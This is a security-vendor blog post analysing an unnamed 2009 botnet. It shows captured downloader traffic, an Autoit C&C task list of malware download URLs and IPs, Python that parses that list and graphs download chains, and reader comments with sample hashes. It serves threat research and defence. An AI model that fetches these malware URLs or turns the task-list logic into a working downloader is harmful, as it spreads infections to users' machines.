
BotnetWeb – Part 2

The security industry is waiting eagerly for Finjan to release more technical details about the botnet of roughly 1.9 million hosts it recently discovered. I got a chance to speak with Finjan's representatives at RSA on April 23rd and asked them about this new, still un-named and un-identified botnet. Unlucky me: Finjan couldn't give any more information, saying that they are currently working with law enforcement agencies and so are not in a position to say more right now.

This did not stop me from carrying my investigation further. I needed to assess the severity of this threat myself and make sure that our customers are protected against it. As far as I'm concerned, it is not the cops or other law enforcement agencies who will protect those 1.9 million victims; that is the job of the security industry. The challenge in front of me was that Finjan did not disclose any clear information that could lead other security researchers to the true identity of this un-named botnet.

There were a few hints in the Finjan report that could be used to explore some hidden aspects of this botnet. The first was that the botnet had been seen downloading Hexzone around March 29. I have covered Hexzone in detail in a previous article, and ESET has also published a very good write-up about it. The second hint was the JoeBox analysis report, which listed the additional malware components downloaded by the un-named botnet.

For a quick re-cap, here is the first GET request as mentioned in the Finjan report:

GET /ploads/eula.exe HTTP/1.1

followed by

GET /ldr/loadlist.php?version=1 HTTP/1.1

A quick look into my sandnet data identified eula.exe as Trojan.VBInject, itself a known generic downloader.

Here is a traffic snippet from my sandnet data:

GET /ldr/loadList.php?version=1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 76.73.21.186
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 09 Feb 2009 06:22:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 115
Connection: close
Content-Type: text/html

http://76.73.21.186/ldr/dl/zchMiB.exe
http://76.73.21.186/ldr/dl/part.exe
http://76.73.21.186/ldr/dl/minisvr4.exe

VBInject reads the malware links from the HTTP response body and installs them on the infected machine. These downloads are also visible in Finjan's download report. My next step was to go through all of my sandnet data to find out how many malware samples had ever been seen downloading Trojan.VBInject. As expected, the results were quite interesting.

According to my (limited) sandnet data, only two malware samples had ever downloaded Trojan.VBInject: one was Virus.Virut and the other Trojan.Autoit. I have covered Virut in detail in a previous article, where I described it as one of the biggest BotnetWebs, responsible for downloading many of the other big botnets. Is Virut the 1.9 million host botnet? My guess is no. Virut has always relied on Trojan.Injector (another big malware download service) to download further components, but in this case the VBInject download link was found hard-coded into the Virut binary. That is not the behaviour of a generic downloader/botnet fetching VBInject on a botmaster's command.

Here is a traffic snippet from that Virut sample while downloading Trojan.VBInject:

[Image: Virut_vbinject, traffic capture of the Virut sample fetching Trojan.VBInject]

So we are left with Trojan.Autoit. Trojan.Autoit is a powerful malware download service and, according to my data, has been seen downloading both Hexzone and VBInject. A perfect match, isn't it? Here is the traffic from the Autoit sample:

GET /0/x.php?hid=531e237606675012bef96b4bef939b8d&mhid=bd1de70c62b17015b639adb2d30f0f0b&version=7&name=Codec_v.1004.1.exe&os=WIN_XP&_=262604330120091 HTTP/1.1
User-Agent: AutoIt v3
Host: www.ophywmntzrtew.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 22 Mar 2009 08:17:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 750
Content-Type: text/html

[version]
version=16
update=http://reopsakwww.com/1/stubv16.exe

[fetch]
delay=20000

[ads]
delay=40
url=

[download_onconnect]
im000.exe=http://reopsakwww.com/up/im.exe
exer000.exe=http://reopsakwww.com/up/exer.exe

[download_once]
avimu000.exe=http://reopsakwww.com/up/avimu.exe
icv002.exe=http://reopsakwww.com/up/icv.exe
ppack000.exe=http://cn.king.cd/hk.exe
seo004.exe=http://reopsakwww.com/up/seo.exe
red000.exe=http://www.plumsauce.info/RED.exe
wr011.exe=http://reopsakwww.com/up/wr.exe
ndlcpt001.exe=http://76.73.62.2/ploads/dlcpt.exe
prox000.exe=http://reopsakwww.com/1/proxy.exe
icc1001.exe=http://reopsakwww.com/up/icc1.exe
icc2001.exe=http://reopsakwww.com/up/icc2.exe
luxe000.exe=http://reopsakwww.com/up/luxe.exe
1496a000.exe=http://reopsakwww.com/up/1496a.exe

As one can see, the HTTP response carries multiple instructions telling Autoit to download and install additional malware components.

The URL under [version] is the updated version of Autoit itself (the request above reports version=7 and the server advertises version=16).

The URLs under [download_onconnect] are downloaded each time Autoit connects to its CnC, whereas the [download_once] URLs are downloaded only once.
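To make the task-list semantics concrete, here is an added example (Python, not the author's tooling) that parses the response body captured above into its sections, reproduces the bot's download decisions for a check-in, and pulls out every host it may contact as blocklist indicators. The section meanings come from the capture; two things are assumptions rather than observed behaviour: that the bot self-updates only when the advertised version is higher than its own, and that it remembers which [download_once] names it has already fetched.

```python
"""Parse the INI-style task list the Trojan.Autoit downloader receives from
its CnC and turn it into a download plan plus network indicators.

Added example for this post, not the author's tooling. Assumed, not
confirmed by the capture: the version comparison and the 'already fetched'
bookkeeping for [download_once]."""
from urllib.parse import urlsplit

# Response body as seen in the sandnet capture above (the bot reported version=7).
SAMPLE_RESPONSE = """\
[version]
version=16
update=http://reopsakwww.com/1/stubv16.exe

[fetch]
delay=20000

[ads]
delay=40
url=
[download_onconnect]
im000.exe=http://reopsakwww.com/up/im.exe
exer000.exe=http://reopsakwww.com/up/exer.exe
[download_once]
avimu000.exe=http://reopsakwww.com/up/avimu.exe
icv002.exe=http://reopsakwww.com/up/icv.exe
ppack000.exe=http://cn.king.cd/hk.exe
seo004.exe=http://reopsakwww.com/up/seo.exe
red000.exe=http://www.plumsauce.info/RED.exe
wr011.exe=http://reopsakwww.com/up/wr.exe
ndlcpt001.exe=http://76.73.62.2/ploads/dlcpt.exe
prox000.exe=http://reopsakwww.com/1/proxy.exe
icc1001.exe=http://reopsakwww.com/up/icc1.exe
icc2001.exe=http://reopsakwww.com/up/icc2.exe
luxe000.exe=http://reopsakwww.com/up/luxe.exe
1496a000.exe=http://reopsakwww.com/up/1496a.exe
"""


def parse_tasklist(body):
    """Return {section: [(key, value), ...]} in server order. Hand-rolled rather
    than configparser: the body is attacker controlled, so junk lines are skipped
    instead of raising, and key case is preserved."""
    sections = {}
    current = None
    for raw in body.splitlines():
        line = raw.strip()
        if not line or line.startswith((';', '#')):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or '=' not in line:
            continue                      # text before the first header, or no '='
        key, _, value = line.partition('=')
        sections[current].append((key.strip(), value.strip()))
    return sections


def plan_downloads(sections, running_version, already_fetched):
    """Reproduce one check-in: the ordered list of (local_name, url) the bot fetches."""
    plan = []
    version = dict(sections.get('version', []))
    try:
        advertised = int(version.get('version', 0))
    except ValueError:
        advertised = 0
    if advertised > running_version and version.get('update'):
        plan.append(('self-update', version['update']))   # assumed update rule
    for name, url in sections.get('download_onconnect', []):
        if url:                           # fetched on every connection
            plan.append((name, url))
    for name, url in sections.get('download_once', []):
        if url and name not in already_fetched:
            plan.append((name, url))      # fetched once, then remembered (assumed)
    return plan


def extract_hosts(sections):
    """Every host named in the task list, for blocklists and proxy-log hunting."""
    hosts = set()
    for entries in sections.values():
        for _, value in entries:
            if value.startswith(('http://', 'https://')):
                host = urlsplit(value).hostname
                if host:
                    hosts.add(host)
    return sorted(hosts)


if __name__ == '__main__':
    tasks = parse_tasklist(SAMPLE_RESPONSE)
    for name, url in plan_downloads(tasks, running_version=7, already_fetched=set()):
        print(f'{name:14} <- {url}')
    print('hosts to block:', ', '.join(extract_hosts(tasks)))
```

Run stand-alone it prints the 15 fetches a freshly infected v7 bot would make (self-update, two onconnect binaries, twelve download_once binaries) and the four hosts to block; calling plan_downloads again with running_version=16 and the twelve names already fetched leaves only the two onconnect entries, which is the steady-state beaconing traffic a sandnet sees on later check-ins.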

Is Autoit the botnet discovered by Finjan? There is one problem: according to Finjan, the botnet's CnCs were located in Ukraine, whereas the Autoit sample I analyzed was talking to www.ophywmntzrtew.info, which is hosted in Malaysia:

address:      PIRADIUS NET
address:      Unit 21-3A, Level 21
address:      Plaza DNP 59, Jalan Abdullah Tahir
address:      Taman Century Garden
address:      80300 Johor Bahru, Johor
address:      Malaysia
phone:        +607 334 8605
fax-no:       +607 334 8605
country:      MY
changed:      20071003
mnt-by:       MAINT-MY-PIRADIUS
source:       APNIC

It looks as though all my efforts to track down the unknown botnet were fruitless, and I am still unsure. On the bright side, in the process I managed to explore a few new BotnetWebs and got a chance to verify the BotnetWeb concept against data from other security vendors such as Finjan.

I will try to cover Autoit in detail in my next article; for the time being, let's just say Autoit is a BotnetWeb downloading the second-stage malware listed below:

1. http://reopsakwww.com/1/stubv16.exe

Updated version of Autoit itself.

http://www.virustotal.com/analisis/8a8654fd12f28750120afa7fc46d3ac5

2. http://reopsakwww.com/up/im.exe

A Trojan which spreads through IM based social engineering.

http://www.virustotal.com/analisis/1278b779066e2c7d7007ccd161658486

The binaries from here on are the ones listed under [download_once], so there is a good chance that these are pay-per-install malware not owned by the actual botmasters.

4. http://reopsakwww.com/up/avimu.exe

AVs are confused on this, so am I.  Nothing can be said about it without a detailed analysis. I'll try to cover it in some future post.

http://www.virustotal.com/analisis/4b4f54d4d6a03f7930314f9e50c59fbb

5. http://reopsakwww.com/up/icv.exe

A well-known backdoor and downloader known as TDSS.

http://www.virustotal.com/analisis/80bd8872089da6eae06957d579ee3cf4

6. http://cn.king.cd/hk.exe

IRC.SDbot, a famous IRC Bot.

http://www.virustotal.com/analisis/6f5704db0c301ac5752bf2e03e99b797

7. http://reopsakwww.com/up/seo.exe

Most AVs are calling this Trojan-Dropper.Win32.Wlord. Nothing detailed from my side right now.

http://www.virustotal.com/analisis/f75e5ef4f909865b82db901052107577

8. http://www.plumsauce.info/RED.exe

No great intel from my side at this moment; most AVs are calling it a downloader.

http://www.virustotal.com/analisis/f5b21231615f89aec50cb6235bce6c73

9. http://reopsakwww.com/up/wr.exe

A trojan downloader, often seen downloading rogue AVs.

http://www.virustotal.com/analisis/feacd3f71d1fca8b06e57b6e61fa4e36

10. http://76.73.62.2/ploads/dlcpt.exe

Trojan.VBInject.  It's discussed in detail in the beginning of this article.

http://www.virustotal.com/analisis/df3c929bab0975e1560fc85d76bb13cd

11. http://reopsakwww.com/1/proxy.exe

http://www.virustotal.com/analisis/7a8495c069ac220a32fd865e43c3c0fd

12. http://reopsakwww.com/up/icc1.exe

Trojan.Piptea, another powerful malware downloader.

http://www.virustotal.com/analisis/ede6257379f870edc572d33f58c0a3ca

13. http://reopsakwww.com/up/icc2.exe

http://www.virustotal.com/analisis/8275470c7c5b22e51c03fdf1c01f4748

14. http://reopsakwww.com/up/luxe.exe

Vundo a.k.a. Virtumonde.

http://www.virustotal.com/analisis/1552d5d75f2dc9fefa112e4afc14a34d

15. http://reopsakwww.com/up/1496a.exe

A generic downloader.

http://www.virustotal.com/analisis/8aa617bf286b02228b270c58c6dc3f46

The overall picture is quite grim. Autoit downloaded dozens of other malware components, including some of the most powerful malware downloaders like Virut and Trojan.VBInject, which in turn downloaded further components. Here I plot all these downloads in graphical form to make them easier to visualize.

[Image: Autoit, download graph of the Autoit BotnetWeb]

Here is the Virut graph from my earlier post. Let's integrate it with the Autoit graph and see how the combined graph looks.

[Image: Autoit_virut, combined Autoit and Virut download graph]
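Both questions worked through above, "which samples have ever been seen downloading VBInject?" and "what does the Autoit graph look like once the Virut graph is folded in?", are graph queries over sandnet records. The following is an added example (Python, not the author's tooling and not the graphs in the images): each observation is (parent, child, url), the records are constructed from the downloads named in this post and the earlier Virut post, URLs the post does not show are left as None, and node names are whatever label the analyst has, a family where one is known and a file name where it is not.

```python
"""Build and query a 'BotnetWeb' download graph from sandnet observations.

Added example for this post, not the author's tooling. Observation records
are constructed from the downloads described in the post; None means the
post did not show the URL."""
from collections import defaultdict, deque

AUTOIT_OBSERVATIONS = [
    ('Trojan.Autoit', 'Trojan.VBInject', 'http://76.73.62.2/ploads/dlcpt.exe'),
    ('Trojan.Autoit', 'TDSS', 'http://reopsakwww.com/up/icv.exe'),
    ('Trojan.Autoit', 'IRC.SDbot', 'http://cn.king.cd/hk.exe'),
    ('Trojan.Autoit', 'Trojan.Piptea', 'http://reopsakwww.com/up/icc1.exe'),
    ('Trojan.Autoit', 'Vundo', 'http://reopsakwww.com/up/luxe.exe'),
    ('Trojan.Autoit', 'Hexzone', None),              # URL not shown in the post
    # What VBInject itself pulled after its loadList.php request (family unknown).
    ('Trojan.VBInject', 'zchMiB.exe', 'http://76.73.21.186/ldr/dl/zchMiB.exe'),
    ('Trojan.VBInject', 'part.exe', 'http://76.73.21.186/ldr/dl/part.exe'),
    ('Trojan.VBInject', 'minisvr4.exe', 'http://76.73.21.186/ldr/dl/minisvr4.exe'),
]
VIRUT_OBSERVATIONS = [
    ('Virus.Virut', 'Trojan.VBInject', None),        # link hard-coded in the binary
    ('Virus.Virut', 'Trojan.Injector', None),
]


class DownloadGraph:
    """Directed graph: parent family -> child it downloaded, with URLs on edges."""

    def __init__(self, records=()):
        self.children = defaultdict(set)   # parent -> {child}
        self.parents = defaultdict(set)    # child  -> {parent}
        self.urls = defaultdict(set)       # (parent, child) -> {url}
        for parent, child, url in records:
            self.add(parent, child, url)

    def add(self, parent, child, url=None):
        self.children[parent].add(child)
        self.parents[child].add(parent)
        if url:
            self.urls[(parent, child)].add(url)
        return self

    def merge(self, other):
        """Union another graph into this one (the 'combined graph' step above)."""
        for parent, kids in other.children.items():
            for child in kids:
                for url in other.urls.get((parent, child)) or {None}:
                    self.add(parent, child, url)
        return self

    def who_downloaded(self, node):
        """Reverse pivot: every family ever seen fetching `node`."""
        return sorted(self.parents.get(node, ()))

    def downstream(self, node):
        """Everything reachable from `node`, however many hops (BFS)."""
        seen, queue = set(), deque([node])
        while queue:
            for child in self.children.get(queue.popleft(), ()):
                if child not in seen:
                    seen.add(child)
                    queue.append(child)
        seen.discard(node)
        return seen

    def to_dot(self):
        """Graphviz source, so the web can be drawn with `dot -Tpng`."""
        lines = ['digraph botnetweb {', '  rankdir=LR;']
        for parent in sorted(self.children):
            for child in sorted(self.children[parent]):
                label = ' '.join(sorted(self.urls.get((parent, child), ())))
                lines.append(f'  "{parent}" -> "{child}" [label="{label}"];')
        lines.append('}')
        return '\n'.join(lines)


if __name__ == '__main__':
    web = DownloadGraph(AUTOIT_OBSERVATIONS).merge(DownloadGraph(VIRUT_OBSERVATIONS))
    print('downloaded VBInject:', web.who_downloaded('Trojan.VBInject'))
    print('reach of Autoit:', sorted(web.downstream('Trojan.Autoit')))
    print(web.to_dot())
```

The reverse pivot answers the first question (on the Autoit records alone only Trojan.Autoit is a parent of VBInject; after the merge Virus.Virut appears as the second), and downstream() shows why a downloader-of-downloaders matters: everything VBInject fetched is reachable from both Autoit and Virut even though neither touched those URLs directly.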

One can easily sense the level of cooperation these malware masterminds must offer each other. Maybe it's time for those of us in the security industry to come together and show the same level of cooperation. As I always say, there are plenty of bad guys out there to keep us (the good guys) in business :).

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM

4 thoughts on “BotnetWeb – Part 2”

  1. FYI, PIRADIUS has popped up several times in my investigations of RBN and Russkrainian cyber crime, so while it is not physically located in the Ukraine, you can bet that the post-RBN Russkrainian criminals involved in this have used PIRADIUS for several years now.
    - ferg

  2. Found these samples on a customer's notebook. The .exe appeared in temp on 12.04. and 13.04. (probably via some porn site) and are not detected by all AVs I tried.
    The 490700….dll was found at various places in ../Macromedia/Common/, like SilentBanker, and was started via RUN and audio drivers.
    The .drv was found in system32 (60 kB larger than the original), also not detected by all AVs I tried. The wua…dll was there as well, but is detected by some AVs.
    Could be tracks of a botnetweb install.
    Keep up your good work!

  3. Here are some more details for readers on one of the mentioned .exe files; the filename was 21ebbf888a25337e.exe
    http://www.threatexpert.com/report.aspx?md5=b30dec0ec2b496d772b457435f3180c6
    Submission details:
      Submission received: 29 April 2009, 05:50:59
      Processing time: 6 min 17 sec
      Submitted sample:
        File MD5: 0xB30DEC0EC2B496D772B457435F3180C6
        File SHA-1: 0x624324E5726AC51074362B5E7A0751E9B75CDD3B
        Filesize: 91,136 bytes
    The following files were created in the system:
      1. %Windir%\msacm32.drv (89,088 bytes)
         MD5: 0xA70F58DCC4EF5970F080326DE6A69749
         SHA-1: 0x2DD8EA11FEC0EAC399D264043A5C9AACF5A303B0
      2. [file and pathname of the sample #1] (91,136 bytes)
         MD5: 0xB30DEC0EC2B496D772B457435F3180C6
         SHA-1: 0x624324E5726AC51074362B5E7A0751E9B75CDD3B
      3. %Windir%\wuasirvy.dll (106 bytes)
         MD5: 0xD610CE7D88980283BA5ECA0E15CA6EC9
         SHA-1: 0x4D9238D44DE7E4CA34C33FACA6A1316EF140E30F
    Rescan a few minutes ago:
    http://www.virustotal.com/analisis/22557c86f56262fc523778891b023a53
    File 21ebbf888a25337e.exe received on 04.29.2009 22:55:58 (CET)
    Current status: finished
    Result: 0/40 (0%)

  4. Keep up the good work guys, I can't wait to see more of these articles.
